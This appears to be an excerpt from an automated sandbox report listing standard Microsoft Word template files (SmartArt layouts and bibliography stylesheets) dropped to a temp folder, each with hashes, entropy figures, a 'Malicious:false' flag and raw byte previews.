                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.e.v.r.o.n.a.c.c.e.n.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8857.tmp\chevronaccent.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4243
                                        Entropy (8bit):7.824383764848892
                                        Encrypted:false
                                        SSDEEP:96:22MQe4zHye8/djzF+JjvtmMkkBpF7e0LTkaf:22De4zHHCvF+nRBDXoaf
                                        MD5:7BC0A35807CD69C37A949BBD51880FF5
                                        SHA1:B5870846F44CAD890C6EFF2F272A037DA016F0D8
                                        SHA-256:BD3A013F50EBF162AAC4CED11928101554C511BD40C2488CF9F5842A375B50CA
                                        SHA-512:B5B785D693216E38B5AB3F401F414CADACCDCB0DCA4318D88FE1763CD3BAB8B7670F010765296613E8D3363E47092B89357B4F1E3242F156750BE86F5F7E9B8D
                                        Malicious:false
                                        Preview:PK........NnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........TnB;..d.....h......._rels/.rels...J.0.._%.n..)"....<.w.&.4..!...y.|.........|.&3.o.....S..K.T5g.U....g..n.f....T*.hcf...D.V..Ft....d....c2".z.....N.s._2....7.0.V.]P.CO?...`...8....4&......_i..Y.T...Z...g....{-...]..pH..@.8....}tP.)..B>..A...S&......9..@...7........b_.PK........r};5.z..............diagrams/layout1.xml.X.n.8.}.........4.+.(...@......(..J..._.!)..b..v.}.H..zf8...dhM....E..I.H..V.Y.R..2zw5L~....^..]...J_..4.\.\......8..z..2T..".X.l.F#......5....,*....c....r.kR.I.E..,.2...&%..''.qF.R.2.....T;F...W.. ...3...AR.OR.O..J}.w6..<...,.x..x....`g?.t.I.{.I...|X..g.....<BR..^...Q.6..m.kp...ZuX.?.z.YO.g...$.......'.]..I.#...]$/~`${.

                                        C:\Users\user\AppData\Local\Temp\TCD887D.tmp\BracketList.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4026
                                        Entropy (8bit):7.809492693601857
                                        Encrypted:false
                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                        Malicious:false
                                        Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                        C:\Users\user\AppData\Local\Temp\TCD887D.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):250
                                        Entropy (8bit):3.4916022431157345
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                        MD5:1A314B08BB9194A41E3794EF54017811
                                        SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                        SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                        SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8892.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):278
                                        Entropy (8bit):3.5280239200222887
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                        MD5:877A8A960B2140E3A0A2752550959DB9
                                        SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                        SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                        SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8892.tmp\gb.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):268317
                                        Entropy (8bit):5.05419861997223
                                        Encrypted:false
                                        SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                        MD5:51D32EE5BC7AB811041F799652D26E04
                                        SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                        SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                        SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                        C:\Users\user\AppData\Local\Temp\TCD88E2.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):242
                                        Entropy (8bit):3.4938093034530917
                                        Encrypted:false
                                        SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                        MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                        SHA1:BA15D036D522978409846EA682A1D7778381266F
                                        SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                        SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD88E2.tmp\TabList.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):4888
                                        Entropy (8bit):7.8636569313247335
                                        Encrypted:false
                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                        Malicious:false
                                        Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                        C:\Users\user\AppData\Local\Temp\TCD88E3.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):258
                                        Entropy (8bit):3.4692172273306268
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                        MD5:C1B36A0547FB75445957A619201143AC
                                        SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                        SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                        SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD88E3.tmp\pictureorgchart.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):7370
                                        Entropy (8bit):7.9204386289679745
                                        Encrypted:false
                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                        Malicious:false
                                        Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                        C:\Users\user\AppData\Local\Temp\TCD88F3.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):280
                                        Entropy (8bit):3.484503080761839
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                        MD5:1309D172F10DD53911779C89A06BBF65
                                        SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                        SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                        SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD88F3.tmp\InterconnectedBlockProcess.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):9191
                                        Entropy (8bit):7.93263830735235
                                        Encrypted:false
                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                        Malicious:false
                                        Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                        C:\Users\user\AppData\Local\Temp\TCD88F4.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):238
                                        Entropy (8bit):3.472155835869843
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                        MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                        SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                        SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                        SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD88F4.tmp\rings.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5151
                                        Entropy (8bit):7.859615916913808
                                        Encrypted:false
                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                        Malicious:false
                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                        C:\Users\user\AppData\Local\Temp\TCD8905.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):254
                                        Entropy (8bit):3.4845992218379616
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                        MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                        SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                        SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                        SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                        C:\Users\user\AppData\Local\Temp\TCD8905.tmp\HexagonRadial.glox

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):6024
                                        Entropy (8bit):7.886254023824049
                                        Encrypted:false
                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                        C:\Users\user\AppData\Local\Temp\TCD8916.tmp\Content.inf

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):332
                                        Entropy (8bit):3.4871192480632223
                                        Encrypted:false
                                        SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                        MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                        SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                        SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                        SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                        Malicious:false
                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                        C:\Users\user\AppData\Local\Temp\TCD8916.tmp\mlaseventheditionofficeonline.xsl

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):254875
                                        Entropy (8bit):5.003842588822783
                                        Encrypted:false
                                        SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                        MD5:377B3E355414466F3E3861BCE1844976
                                        SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                        SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                        SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                        Malicious:false
